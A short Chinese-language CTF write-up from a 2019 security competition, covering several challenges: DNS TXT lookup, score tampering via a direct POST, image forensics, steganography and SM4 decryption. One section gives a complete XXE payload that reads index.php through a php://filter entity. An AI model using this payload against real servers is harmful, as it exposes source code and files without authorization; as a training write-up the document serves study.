2019网络与信息安全领域专项赛wp

没能打进线下,记录一下除队友做的外我做的几道,留作温习。

签到题

nslookup -q=TXT gamectf.com

game

在cqg.js中有发送ajax。

if(score == 15){ $.ajax({ url: 'score.php', type: 'POST', data: 'score='+score, success: function(data){ var data = data; $("#output").text(data); } }) }

直接向score.php post score=5即可得到flag

whoareyou

抓包发现发送了xml请求,输入&加任意字符报错,联想到XXE漏洞,payload如下:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT author ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]><feedback><author>&xxe;</author></feedback>

flag就在源码内

七代目

gif修复,加上文件头后逐帧分离,得到flag

亚萨西

压缩包winhex打开发现文件尾密码,解开压缩包,分离包内图片,放入stegsove,得到ook编码,解码即为flag。

24word

图片为核心价值观编码,解码结果为压缩包密码,压缩包内有图片,扫描二维码可得flag。

sm4

用题目所给直接密文、密钥转16进制,再解密即可得flag。

0%